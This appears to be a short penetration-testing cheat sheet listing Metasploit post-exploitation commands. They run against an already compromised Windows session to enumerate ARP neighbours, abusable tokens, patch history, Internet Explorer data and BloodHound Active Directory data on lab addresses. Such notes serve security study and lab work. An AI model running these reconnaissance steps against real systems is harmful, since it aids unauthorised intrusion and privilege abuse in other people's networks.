Enumeration 2 - Arp, Tokens, Patches

#get mac and ip
use post/windows/gather/arp_scanner
options
set rhost 192.168.56.10 192.168.56.22
run

#get the available tokens that we can exploit or abuse
use post/windows/gather/enum_tokens
set session 2
run

#get the patch history of the server
use post/windows/gather/enum_patches
options
set session 2
run

#retrieves IE information
use post/windows/gather/enum_ie
options
set session 2
run

#executes the bloodhound data ingestor
use post/windows/gather/bloodhound
options
set session 2
run


#search for more windows modules
search post/windows/gather
search post/windows/
search post/windows/recon

Last updated